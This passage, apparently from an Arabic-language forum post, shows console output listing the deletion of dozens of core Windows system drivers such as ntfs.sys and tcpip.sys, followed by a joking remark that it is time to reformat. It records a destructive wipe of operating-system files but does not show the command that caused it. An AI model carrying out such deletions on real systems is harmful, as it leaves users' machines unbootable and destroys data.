      212. Deleted file - C:\WINDOWS\system32\drivers\nmnt.sys
      213. Deleted file - C:\WINDOWS\system32\drivers\npfs.sys
      214. Deleted file - C:\WINDOWS\system32\drivers\ntfs.sys
      215. Deleted file - C:\WINDOWS\system32\drivers\null.sys
      216. Deleted file - C:\WINDOWS\system32\drivers\nwlnkflt.sys
      217. Deleted file - C:\WINDOWS\system32\drivers\nwlnkfwd.sys
      218. Deleted file - C:\WINDOWS\system32\drivers\nwlnkipx.sys
      219. Deleted file - C:\WINDOWS\system32\drivers\nwlnknb.sys
      220. Deleted file - C:\WINDOWS\system32\drivers\nwlnkspx.sys
      221. Deleted file - C:\WINDOWS\system32\drivers\nwrdr.sys
      222. Deleted file - C:\WINDOWS\system32\drivers\oprghdlr.sys
      223. Deleted file - C:\WINDOWS\system32\drivers\p3.sys
      224. Deleted file - C:\WINDOWS\system32\drivers\parport.sys
      225. Deleted file - C:\WINDOWS\system32\drivers\partmgr.sys
      226. Deleted file - C:\WINDOWS\system32\drivers\parvdm.sys
      227. Deleted file - C:\WINDOWS\system32\drivers\pci.sys
      228. Deleted file - C:\WINDOWS\system32\drivers\pciidex.sys
      229. Deleted file - C:\WINDOWS\system32\drivers\pcmcia.sys
      230. Deleted file - C:\WINDOWS\system32\drivers\portcls.sys
      231. Deleted file - C:\WINDOWS\system32\drivers\processr.sys
      232. Deleted file - C:\WINDOWS\system32\drivers\psched.sys
      233. Deleted file - C:\WINDOWS\system32\drivers\ptilink.sys
      234. Deleted file - C:\WINDOWS\system32\drivers\rasacd.sys
      235. Deleted file - C:\WINDOWS\system32\drivers\rasl2tp.sys
      236. Deleted file - C:\WINDOWS\system32\drivers\raspppoe.sys
      237. Deleted file - C:\WINDOWS\system32\drivers\raspptp.sys
      238. Deleted file - C:\WINDOWS\system32\drivers\raspti.sys
      239. Deleted file - C:\WINDOWS\system32\drivers\rawwan.sys
      240. Deleted file - C:\WINDOWS\system32\drivers\rdbss.sys
      241. Deleted file - C:\WINDOWS\system32\drivers\rdpcdd.sys
      242. Deleted file - C:\WINDOWS\system32\drivers\rdpdr.sys
      243. Deleted file - C:\WINDOWS\system32\drivers\rdpwd.sys
      244. Deleted file - C:\WINDOWS\system32\drivers\redbook.sys
      245. Deleted file - C:\WINDOWS\system32\drivers\rio8drv.sys
      246. Deleted file - C:\WINDOWS\system32\drivers\riodrv.sys
      247. Deleted file - C:\WINDOWS\system32\drivers\rmcast.sys
      248. Deleted file - C:\WINDOWS\system32\drivers\rndismp.sys
      249. Deleted file - C:\WINDOWS\system32\drivers\rootmdm.sys
      250. Deleted file - C:\WINDOWS\system32\drivers\scsiport.sys
      251. Deleted file - C:\WINDOWS\system32\drivers\sdbus.sys
      252. Deleted file - C:\WINDOWS\system32\drivers\secdrv.sys
      253. Deleted file - C:\WINDOWS\system32\drivers\serenum.sys
      254. Deleted file - C:\WINDOWS\system32\drivers\serial.sys
      255. Deleted file - C:\WINDOWS\system32\drivers\sffdisk.sys
      256. Deleted file - C:\WINDOWS\system32\drivers\sffp_mmc.sys
      257. Deleted file - C:\WINDOWS\system32\drivers\sffp_sd.sys
      258. Deleted file - C:\WINDOWS\system32\drivers\sfloppy.sys
      259. Deleted file - C:\WINDOWS\system32\drivers\smclib.sys
      260. Deleted file - C:\WINDOWS\system32\drivers\sonydcam.sys
      261. Deleted file - C:\WINDOWS\system32\drivers\splitter.sys
      262. Deleted file - C:\WINDOWS\system32\drivers\sr.sys
      263. Deleted file - C:\WINDOWS\system32\drivers\srv.sys
      264. Deleted file - C:\WINDOWS\system32\drivers\stream.sys
      265. Deleted file - C:\WINDOWS\system32\drivers\swenum.sys
      266. Deleted file - C:\WINDOWS\system32\drivers\swmidi.sys
      267. Deleted file - C:\WINDOWS\system32\drivers\sysaudio.sys
      268. Deleted file - C:\WINDOWS\system32\drivers\tape.sys
      269. Deleted file - C:\WINDOWS\system32\drivers\tcpip.sys
      270. Deleted file - C:\WINDOWS\system32\drivers\tcpip6.sys
      271. Deleted file - C:\WINDOWS\system32\drivers\tdi.sys
      272. Deleted file - C:\WINDOWS\system32\drivers\tdpipe.sys
      273. Deleted file - C:\WINDOWS\system32\drivers\tdtcp.sys
      274. Deleted file - C:\WINDOWS\system32\drivers\termdd.sys
      275. Deleted file - C:\WINDOWS\system32\drivers\tosdvd.sys
      276. Deleted file - C:\WINDOWS\system32\drivers\tsbvcap.sys
      277. Deleted file - C:\WINDOWS\system32\drivers\tunmp.sys
      278. Deleted file - C:\WINDOWS\system32\drivers\udfs.sys
      279. Deleted file - C:\WINDOWS\system32\drivers\update.sys
      280. Deleted file - C:\WINDOWS\system32\drivers\usb8023.sys
      281. Deleted file - C:\WINDOWS\system32\drivers\usbcamd.sys
      282. Deleted file - C:\WINDOWS\system32\drivers\usbcamd2.sys
      283. Deleted file - C:\WINDOWS\system32\drivers\usbd.sys
      284. Deleted file - C:\WINDOWS\system32\drivers\usbehci.sys
      285. Deleted file - C:\WINDOWS\system32\drivers\usbhub.sys
      286. Deleted file - C:\WINDOWS\system32\drivers\usbintel.sys
      287. Deleted file - C:\WINDOWS\system32\drivers\usbport.sys
      288. Deleted file - C:\WINDOWS\system32\drivers\USBSTOR.SYS
      289. Deleted file - C:\WINDOWS\system32\drivers\usbuhci.sys
      290. Deleted file - C:\WINDOWS\system32\drivers\vdmindvd.sys
      291. Deleted file - C:\WINDOWS\system32\drivers\vga.sys
      292. Deleted file - C:\WINDOWS\system32\drivers\viaide.sys
      293. Deleted file - C:\WINDOWS\system32\drivers\videoprt.sys
      294. Deleted file - C:\WINDOWS\system32\drivers\vinyl97.sys
      295. Deleted file - C:\WINDOWS\system32\drivers\volsnap.sys
      296. Deleted file - C:\WINDOWS\system32\drivers\vtmini.sys
      297. Deleted file - C:\WINDOWS\system32\drivers\wanarp.sys
      298. Deleted file - C:\WINDOWS\system32\drivers\wdmaud.sys
      299. Deleted file - C:\WINDOWS\system32\drivers\wmilib.sys
      300. Deleted file - C:\WINDOWS\system32\drivers\ws2ifsl.sys
      301. Press any key to continue . . .[/COLOR][/SIZE][/FONT]
      302. [FONT=Times New Roman][size=14][COLOR=red]
      عرض الكل


      جاء وقت الفرمته :)